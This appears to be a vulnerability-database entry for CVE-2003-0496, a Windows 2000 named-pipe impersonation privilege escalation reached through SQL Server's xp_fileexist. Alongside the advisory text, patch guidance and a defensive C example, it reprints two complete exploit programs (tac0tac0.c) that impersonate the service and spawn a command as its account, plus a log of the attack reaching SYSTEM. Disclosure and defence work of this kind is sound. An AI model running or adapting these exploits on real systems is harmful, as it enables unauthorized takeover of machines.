CVE-2003-0496
CVSS 7.2
Published: 2003-08-18 00:00:00
Revised: 2016-10-17 22:34:40
NMCOES    

[Original] Microsoft SQL Server before Windows 2000 SP4 allows local users to gain privileges as the SQL Server user by calling the xp_fileexist extended stored procedure with a named pipe as an argument instead of a normal file.


[CNNVD] Windows Named Pipe Filename Local Privilege Escalation Vulnerability (CNNVD-200308-060)

        
        Microsoft Windows is the operating system developed by Microsoft.
        By passing the name of a named pipe, rather than an ordinary file, as the argument to the SQL Server xp_fileexist extended stored procedure, a local user can make the service open the pipe; the owner of the pipe can then run a program with the privileges of the SQL Server service account (or of whichever other service process was tricked into opening the pipe), resulting in privilege escalation.
        The root cause is the behaviour of the CreateFile API combined with the impersonation feature of Windows named pipes. CreateFile opens or creates files, named pipes, mailslots and other objects, and nothing restricts which kind of object a given call will end up opening. Most Win32 services run under the SYSTEM account and process files in some way; if a user can make a service open a path of the user's choosing, and that path is a named pipe the user has created, the user's pipe server can impersonate the service's identity. Furthermore, if the path is given in UNC form, the server does not need to read from the pipe before impersonating the client.
        Microsoft SQL Server makes the issue easy to exploit, because it has many procedures that take a file name to operate on. xp_fileexist is one of them and is executable by all users (public). By creating a named-pipe server with an arbitrary name and passing the pipe's UNC name as the argument to xp_fileexist, an attacker can impersonate the SQL Server service account and execute a program with its privileges.
        Other services may be affected by the same class of problem.
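
The defensive counterpart of the mechanism described above, as an added example written for this page (it is not code from the @stake advisory, from Microsoft, or from the exploit authors). A service that opens a caller-supplied path has two places to intervene: before the open, it can refuse the spellings that CreateFile resolves to the named-pipe device; on the open itself, it can pass SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION so that, if a pipe slips through anyway, the pipe's owner only obtains an identification-level token, which cannot be turned into a primary token for CreateProcessAsUser; afterwards it can confirm with GetFileType that the handle is a disk file. The path classifier is portable C and runs anywhere; the open helper is Windows-only and compiled under _WIN32. The function names `is_named_pipe_path` and `open_disk_file_only`, and the sample paths, are this example's own.

```c
#include <ctype.h>
#include <stdio.h>

/* Returns 1 if `path` is a spelling that the Win32 CreateFile() API would
 * resolve to a named pipe rather than a disk file, for example:
 *   \\.\pipe\name   \\?\pipe\name   \\host\pipe\name   //host/pipe/name
 * Win32 path normalisation treats '/' like '\' and the share/device component
 * is case-insensitive, so all of those variants have to be caught. */
int is_named_pipe_path(const char *path)
{
    const char *p = path;
    const char *share;
    size_t len;

    /* A pipe path always starts with two separators (UNC or device path). */
    if (!(p[0] == '\\' || p[0] == '/') || !(p[1] == '\\' || p[1] == '/'))
        return 0;
    p += 2;

    /* Skip the host component (".", "?", "SERVERNAME", ...). */
    while (*p && *p != '\\' && *p != '/')
        p++;
    if (!*p)
        return 0;
    p++;

    /* The share/device component must be exactly "pipe", in any case. */
    share = p;
    while (*p && *p != '\\' && *p != '/')
        p++;
    len = (size_t)(p - share);
    if (len != 4)
        return 0;
    return tolower((unsigned char)share[0]) == 'p' &&
           tolower((unsigned char)share[1]) == 'i' &&
           tolower((unsigned char)share[2]) == 'p' &&
           tolower((unsigned char)share[3]) == 'e';
}

#ifdef _WIN32
#include <windows.h>

/* Opens `path` for reading only if it is a genuine disk file.  The SQOS flags
 * cap what a pipe server at the other end can do with our identity: with
 * SECURITY_IDENTIFICATION the server gets a token usable for access checks but
 * not for DuplicateTokenEx(..., TokenPrimary, ...)/CreateProcessAsUser.  The
 * GetFileType() check runs after the open, i.e. after the server has already
 * had its chance to impersonate, which is why the flags belong on the open. */
HANDLE open_disk_file_only(const char *path)
{
    HANDLE h;

    if (is_named_pipe_path(path))
        return INVALID_HANDLE_VALUE;

    h = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
                    FILE_ATTRIBUTE_NORMAL | SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION,
                    NULL);
    if (h == INVALID_HANDLE_VALUE)
        return h;
    if (GetFileType(h) != FILE_TYPE_DISK) {   /* pipe, console, or other device */
        CloseHandle(h);
        return INVALID_HANDLE_VALUE;
    }
    return h;
}
#endif

int main(void)
{
    /* Constructed sample paths: the advisory's pipe spelling plus variants. */
    const char *samples[] = {
        "\\\\TEMP123\\pipe\\atstake",
        "\\\\.\\pipe\\poop",
        "//./PIPE/poop",
        "\\\\?\\pipe\\x",
        "C:\\data\\report.txt",
        "\\\\fileserver\\share\\report.txt",
        "\\\\fileserver\\share\\pipe\\report.txt",
    };
    size_t i;

    for (i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
        printf("%-42s -> %s\n", samples[i],
               is_named_pipe_path(samples[i]) ? "named pipe, refuse" : "ok");
    return 0;
}
```

The string check is defence in depth only: other spellings and indirections can still reach the pipe device, so the SQOS flag on the CreateFile call is the control that actually neutralises the impersonation, and the GetFileType check stops the service from going on to treat a pipe as data. On the SQL Server side the administrative counterpart is to stop granting public execute on file-taking extended procedures (in master, `REVOKE EXECUTE ON xp_fileexist FROM public`) and to run the MSSQLSERVER service under a low-privileged account rather than LocalSystem, in addition to applying Windows 2000 SP4.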
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can render the system completely unavailable]
Access complexity: LOW [no specialised access conditions are required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000::sp3:professional  (Microsoft Windows 2000 Professional SP3)
cpe:/o:microsoft:windows_2000_terminal_services::sp2
cpe:/o:microsoft:windows_2000::sp1:professional  (Microsoft Windows 2000 Professional SP1)
cpe:/o:microsoft:windows_2000::sp2:professional  (Microsoft Windows 2000 Professional SP2)
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2000::sp3:advanced_server  (Microsoft Windows 2000 Advanced Server SP3)
cpe:/o:microsoft:windows_2000::sp2:advanced_server  (Microsoft Windows 2000 Advanced Server SP2)
cpe:/o:microsoft:windows_2000::sp1:advanced_server  (Microsoft Windows 2000 Advanced Server SP1)
cpe:/o:microsoft:windows_2000::sp1:server  (Microsoft Windows 2000 Server SP1)
cpe:/o:microsoft:windows_2000::sp3:server  (Microsoft Windows 2000 Server SP3)
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000_terminal_services::sp3
cpe:/o:microsoft:windows_2000::sp3:datacenter_server  (Microsoft Windows 2000 Datacenter Server SP3)
cpe:/o:microsoft:windows_2000_terminal_services::sp1
cpe:/o:microsoft:windows_2000::sp1:datacenter_server  (Microsoft Windows 2000 Datacenter Server SP1)
cpe:/o:microsoft:windows_2000::sp2:datacenter_server  (Microsoft Windows 2000 Datacenter Server SP2)
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000_terminal_services
cpe:/o:microsoft:windows_2000::sp2:server  (Microsoft Windows 2000 Server SP2)

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0496
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0496
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-060
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0013.html
(VENDOR_ADVISORY)  VULNWATCH  20030709 Pipe Filename Local Privilege Escalation FAQ
http://marc.info/?l=bugtraq&m=105820282607865&w=2
(UNKNOWN)  BUGTRAQ  20030714 @stake named pipe exploit
http://marc.info/?l=bugtraq&m=105830986720243&w=2
(UNKNOWN)  BUGTRAQ  20030715 CreateFile exploit, (working)
http://www.atstake.com/research/advisories/2003/a070803-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A070803-1

- Vulnerability information

Windows Named Pipe Filename Local Privilege Escalation Vulnerability
High   Design error
Published 2003-08-18 00:00:00   Updated 2005-10-20 00:00:00
Local
        
        

- Advisories and patches

        Vendor patch:
        Microsoft
        ---------
        The vendor has released an update that fixes this security issue; download it from the vendor's site.
        Download and install Windows 2000 Service Pack 4:
        
        http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/

- Vulnerability information (22882)

Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1) (EDBID:22882)
windows local
2003-07-08 Verified
0 Maceo
N/A
source: http://www.securityfocus.com/bid/8128/info

It has been reported that Microsoft Windows does not properly handle named pipes through the CreateFile API. Because of this, an attacker may be able to gain access to the SYSTEM account.


/*  tac0tac0.c - pay no attention to the name, long story...
 *
 *  Author:  Maceo
 *  Modified to take advantage of CAN-2003-0496 Named Pipe Filename
 *  Local Privilege Escalation Found by @stake. Use with their Advisory.
 *  -wirepair@sh0dan.org http://sh0dan.org
 *
 *  All credits for code go to Maceo, i really did minimal work
 *  with his code, it took me like 3 seconds heh.
 *  Shouts to #innercircle,
 */

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main(int argc, char **argv)
{
    char   szPipe[64];
    char   szUser[256];
    DWORD  dwSize = sizeof(szUser);
    HANDLE hPipe;

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <cmd.exe>\n"
                        "Named Pipe Local Priv Escalation found by @stake.\n"
                        "This code is to be used with MS-SQL exactly as outlined in their advisory\n"
                        "All credit for this code goes to Maceo, he did a fine job.. -wire\n",
                argv[0]);
        exit(1);
    }

    /* The pipe the victim service will be asked to open as a "file";
     * the SQL client refers to it as \\SERVERNAME\pipe\poop in xp_fileexist. */
    sprintf(szPipe, "\\\\.\\pipe\\poop");

    /* Create the pipe server before the privileged service opens the name. */
    hPipe = CreateNamedPipe(szPipe, PIPE_ACCESS_DUPLEX,
                            PIPE_TYPE_MESSAGE | PIPE_WAIT,
                            2, 0, 0, 0, NULL);
    if (hPipe == INVALID_HANDLE_VALUE) {
        printf("Failed to create named pipe:\n  %s\n", szPipe);
        return 3;
    }

    /* Block until the service's CreateFile() connects to our pipe. */
    ConnectNamedPipe(hPipe, NULL);

    /* Assume the identity of the client (the SQL Server service account). */
    if (!ImpersonateNamedPipeClient(hPipe)) {
        printf("Failed to impersonate the named pipe.\n");
        CloseHandle(hPipe);
        return 5;
    }

    /* Display the impersonated user's name. */
    GetUserName(szUser, &dwSize);
    printf("Impersonating: %s\n", szUser);

    /* Note: system() launches the child with the process's primary token, not
     * with the thread's impersonation token, so the command does not
     * necessarily run under the impersonated identity; version (2) below uses
     * DuplicateTokenEx and CreateProcessAsUser for that reason. */
    system(argv[1]);
    CloseHandle(hPipe);
    return 0;
}

- Vulnerability information (22883)

Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2) (EDBID:22883)
windows local
2003-07-08 Verified
0 Maceo
N/A
source: http://www.securityfocus.com/bid/8128/info
 
It has been reported that Microsoft Windows does not properly handle named pipes through the CreateFile API. Because of this, an attacker may be able to gain access to the SYSTEM account.

/*  tac0tac0.c - pay no attention to the name, long story...
 *
 *  Author:  Maceo
 *  Modified to take advantage of CAN-2003-0496 Named Pipe Filename
 *  Local Privilege Escalation Found by @stake. Use with their advisory
 *  -wirepair@sh0dan.org http://sh0dan.org/files/tac0tac0.c
 *
 *  All credits for code go to Maceo, i really did minimal work
 *  with his code, it took me like 3 seconds heh.
 *  Shouts to #innercircle,
 */

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main(int argc, char **argv)
{
    char                 szPipe[64];
    char                 szUser[256];
    DWORD                dwSize  = sizeof(szUser);
    HANDLE               hPipe;
    HANDLE               hToken  = NULL;
    HANDLE               hToken2 = NULL;
    SECURITY_ATTRIBUTES  sa;
    PSECURITY_DESCRIPTOR pSD     = NULL;
    STARTUPINFO          si;
    PROCESS_INFORMATION  pi;

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <cmd.exe>\n"
                        "Named Pipe Local Priv Escalation found by @stake.\n"
                        "This code is to be used with MS-SQL exactly as outlined in their advisory\n"
                        "All credit for this code goes to Maceo, he did a fine job.. -wire\n"
                        "Also thanks goes to brett Moore for helping me with DuplicateTokenEx, thanks buddy guy!\n",
                argv[0]);
        exit(1);
    }
    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));
    sprintf(szPipe, "\\\\.\\pipe\\poop");

    /* Create the named pipe the victim service will be told to open. */
    hPipe = CreateNamedPipe(szPipe, PIPE_ACCESS_DUPLEX,
                            PIPE_TYPE_MESSAGE | PIPE_WAIT, 2, 0, 0, 0, NULL);
    if (hPipe == INVALID_HANDLE_VALUE) {
        printf("Failed to create named pipe:\n  %s\n", szPipe);
        return 3;
    }
    printf("Created Named Pipe: %s\n", szPipe);

    /* Security attributes with a NULL DACL (everyone has full access), used
     * for the duplicated token and for the new process's handles. */
    pSD = (PSECURITY_DESCRIPTOR)LocalAlloc(LPTR, SECURITY_DESCRIPTOR_MIN_LENGTH);
    InitializeSecurityDescriptor(pSD, SECURITY_DESCRIPTOR_REVISION);
    SetSecurityDescriptorDacl(pSD, TRUE, NULL, FALSE);
    sa.nLength              = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = pSD;
    sa.bInheritHandle       = FALSE;

    printf("Waiting for connection...\n");
    /* Block until the service connects (xp_fileexist '\\SERVERNAME\pipe\poop'). */
    ConnectNamedPipe(hPipe, NULL);

    /* Assume the identity of the client. */
    if (!ImpersonateNamedPipeClient(hPipe)) {
        printf("Failed to impersonate the named pipe.\n");
        CloseHandle(hPipe);
        return 5;
    }

    /* Grab the impersonation token that is now attached to this thread. */
    if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken)) {
        printf("OpenThreadToken failed, GetLastError: %lu\n", GetLastError());
        CloseHandle(hPipe);
        exit(0);
    }

    /* Turn the impersonation token into a primary token that
     * CreateProcessAsUser will accept. */
    printf("Duplicating Token...\n");
    if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, &sa, SecurityImpersonation,
                          TokenPrimary, &hToken2)) {
        printf("error in duplicate token\n");
        printf("GetLastError: %lu\n", GetLastError());
        CloseHandle(hToken);
        CloseHandle(hPipe);
        exit(0);
    }

    /* Display the impersonated user's name. */
    GetUserName(szUser, &dwSize);
    printf("Impersonating: %s\n", szUser);

    si.cb        = sizeof(si);
    si.lpDesktop = NULL;

    printf("Creating New Process %s\n", argv[1]);
    if (!CreateProcessAsUser(hToken2, NULL, argv[1], &sa, &sa, TRUE,
                             NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,
                             NULL, NULL, &si, &pi)) {
        printf("CreateProcessAsUser failed, GetLastError: %lu\n", GetLastError());
    } else {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }

    CloseHandle(hToken2);
    CloseHandle(hToken);
    CloseHandle(hPipe);
    LocalFree(pSD);
    return 0;
}
		

- Vulnerability information

10126
Microsoft SQL Server CreateFile API Function Privilege Escalation

- Description

Unknown or Incomplete

- Timeline

2003-07-08 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Credit

Unknown or Incomplete

- Vulnerability information

Microsoft Windows CreateFile API Named Pipe Privilege Escalation Vulnerability
Design Error   BID 8128
Remote: No   Local: Yes
Published 2003-07-08 12:00:00   Updated 2009-07-11 10:56:00
Discovery credited to Andreas Junestam.

- Affected versions

Microsoft Windows 2000 Terminal Services SP3
+ Microsoft Windows 2000 Advanced Server SP3
+ Microsoft Windows 2000 Datacenter Server SP3
+ Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- Unaffected versions

Microsoft Windows 2000 Terminal Services SP4
+ Microsoft Windows 2000 Advanced Server SP4
+ Microsoft Windows 2000 Datacenter Server SP4
+ Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4

- Discussion

It has been reported that Microsoft Windows does not properly handle named pipes through the CreateFile API. Because of this, an attacker may be able to gain access to the SYSTEM account.

- Exploit

C:\>mssqlpipe.exe cmd.exe
Creating pipe: \\.\Pipe\atstake
Pipe created, waiting for connection
Connect to the database (with isql for example) and execute:
xp_fileexist '\\SERVERNAME\pipe\atstake'

Then in command shell #2:

C:\>isql -U andreas
Password:
1> xp_fileexist '\\TEMP123\pipe\atstake'
2> go
File Exists File is a Directory Parent Directory Exists
----------- ------------------- -----------------------
          1                   0                       1

Then, back in command shell #1:

Impersonate user successful, we are running as user: SYSTEM

A functional version of the tac0tac0.c exploit has been released. The developer of the exploit has advised users to build the exploit in Release mode (and not Debug mode).

- Solution

This issue has been resolved in Windows 2000 Service Pack 4, which is the fix for the following releases:

Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Terminal Services
Microsoft Windows 2000 Terminal Services SP1
Microsoft Windows 2000 Terminal Services SP2
Microsoft Windows 2000 Terminal Services SP3

- Related references


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.